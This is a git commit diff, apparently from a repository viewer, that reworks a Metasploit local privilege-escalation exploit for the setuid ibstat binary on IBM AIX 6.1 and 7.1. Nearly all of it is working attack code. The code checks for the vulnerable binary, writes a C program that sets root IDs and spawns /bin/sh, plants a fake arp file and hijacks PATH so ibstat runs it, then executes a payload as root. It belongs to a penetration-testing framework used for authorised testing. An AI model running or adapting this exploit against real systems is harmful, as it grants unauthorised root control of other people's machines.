Switch post module to fixed exploit module.
parent
1d9e788649
commit
e6c1dd3f9e
|
@ -17,8 +17,8 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
'Author' =>
|
||||
[
|
||||
'Kristian Erik Hermansen', #original author
|
||||
'Sagi Shahar <sagi.shahar[at]mwrinfosecurity.com>', #msf module
|
||||
'Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>', #msf module
|
||||
'Sagi Shahar <sagi.shahar[at]mwrinfosecurity.com>', #Metasploit module
|
||||
'Kostas Lintovois <kostas.lintovois[at]mwrinfosecurity.com>', #Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
|
@ -28,14 +28,21 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43827' ],
|
||||
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=isg1IV43756' ]
|
||||
],
|
||||
'Platform' => [ 'aix' ],
|
||||
'Arch' => [ 'ppc' ],
|
||||
'Targets' =>
|
||||
'Platform' => [ 'unix' ],
|
||||
'Arch' => ARCH_CMD,
|
||||
'Payload' =>
|
||||
{
|
||||
'Compat' =>
|
||||
{
|
||||
'PayloadType' => 'cmd',
|
||||
'RequiredCmd' => 'perl',
|
||||
}
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'IBM AIX Version 6.1', {} ],
|
||||
[ 'IBM AIX Version 7.1', {} ],
|
||||
],
|
||||
'RequiredCmd' => 'generic',
|
||||
'DefaultTarget' => 1,
|
||||
'DisclosureDate'=> "Sep 24 2013",
|
||||
))
|
||||
|
@ -45,11 +52,11 @@ class Metasploit4 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def check
|
||||
ls_output = cmd_exec "find /usr/sbin/ -name ibstat -perm -u=s -user root 2>/dev/null"
|
||||
if ls_output.include? ("ibstat")
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
Exploit::CheckCode::Safe
|
||||
ls_output = cmd_exec "find /usr/sbin/ -name ibstat -perm -u=s -user root 2>/dev/null"
|
||||
if ls_output.include? ("ibstat")
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
@ -67,7 +74,7 @@ int main()
|
|||
{
|
||||
setreuid(0,0);
|
||||
setregid(0,0);
|
||||
execve("/bin/sh",NULL.NULL);
|
||||
execve("/bin/sh",NULL,NULL);
|
||||
return 0;
|
||||
}
|
||||
^
|
||||
|
@ -92,40 +99,50 @@ chmod 4555 #{root_file}
|
|||
write_file("#{arp_file}",arp)
|
||||
cmd_exec "chmod 0555 #{arp_file}"
|
||||
print_status("Custom arp file written")
|
||||
print_status("Updating PATH environment variable...")
|
||||
print_status("Updating $PATH environment variable...")
|
||||
path_env = cmd_exec 'echo $PATH'
|
||||
cmd_exec 'PATH=.:$PATH'
|
||||
cmd_exec 'export PATH'
|
||||
print_status("Triggering vulnerablity...")
|
||||
cmd_exec '/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null'
|
||||
print_status("Removing custom arp...")
|
||||
file_rm("#{arp_file}")
|
||||
print_status('Restoring $PATH environment variable...')
|
||||
cmd_exec "PATH=#{path_env}"
|
||||
cmd_exec 'export PATH'
|
||||
cmd_exec "#{root_file}"
|
||||
print_status("Checking root privileges...")
|
||||
is_root?
|
||||
if is_root?
|
||||
print_status("Executing payload...")
|
||||
cmd_exec "#{payload.encoded}"
|
||||
end
|
||||
end
|
||||
|
||||
def gcc_installed?
|
||||
print_status("Checking if gcc exists...")
|
||||
gcc_version = cmd_exec 'gcc -v'
|
||||
gcc_array = gcc_version.split("\n")
|
||||
gcc_array.each do |res|
|
||||
if res.include? ("gcc version")
|
||||
print_good("gcc found! (#{res})")
|
||||
return true
|
||||
end
|
||||
print_status("Checking if gcc exists...")
|
||||
gcc_version = cmd_exec 'gcc -v'
|
||||
gcc_array = gcc_version.split("\n")
|
||||
gcc_array.each do |res|
|
||||
if res.include? ("gcc version")
|
||||
print_good("gcc found! (#{res})")
|
||||
return true
|
||||
end
|
||||
print_status("gcc not found. Using /bin/sh from local system")
|
||||
false
|
||||
end
|
||||
print_status("gcc not found. Using /bin/sh from local system")
|
||||
false
|
||||
end
|
||||
|
||||
def is_root?
|
||||
id_output = cmd_exec "id"
|
||||
if id_output.include? ("euid=0(root)")
|
||||
print_good("Got root! (euid)")
|
||||
elsif id_output.include?("uid=0(root)")
|
||||
print_good("Got root!")
|
||||
else
|
||||
print_status("Exploit failed")
|
||||
return true
|
||||
end
|
||||
if id_output.include?("uid=0(root)")
|
||||
print_good("Got root!")
|
||||
return true
|
||||
end
|
||||
print_status("Exploit failed")
|
||||
false
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue